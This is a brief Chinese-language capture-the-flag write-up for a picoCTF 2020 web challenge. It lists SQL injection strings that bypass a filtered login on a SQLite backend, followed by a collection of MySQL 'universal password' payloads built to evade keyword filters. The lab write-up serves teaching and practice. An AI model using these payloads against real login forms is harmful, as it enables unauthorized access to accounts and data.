picoCTF 2020 Mini-Competition的web题
最后发现flag就在http://jupiter.challenges.picoctf.org:50595/filter.php(孩子傻了
5轮全是关键字绕过登录
感觉重点就是数据库是sqlite。。。
answer:
round 1: admin’–+
round 2&3: admin’;%00
round 4&5: ad’||‘min’;%00
一些其他的不含+ and or like > < – = 的“万能密码”(mysql可用)
select * from users where username='$name' and password='$pass';
name:
a'+0;%00
'=0;%00
'|0#
'&0#
'^0#
'&''#
'%11&1#
'&1&1#
'|0&1#
'*9;%00
'/9;%00
'%9;%00
'+0;%00
'*9*8*7*6*5#
'/2/3/4#
'%12%34%56%78;%00
'/**/+/**/0#\
'+0;%00
'+++0+++++0*0#
'*round(1,1);%00
'&left(0,0)#
'*round(0,1)*round(0,1);%00
'div 1;%00
'is not null;%00
'regexp 1;%00
'*0*'';%00
'+'';%00
' || '
;%00
sqlite数据库连接符 || Eg:‘ad’||‘min’,绕过屏蔽admin
%00为截断,所以要写成 ;%00
–+不用加;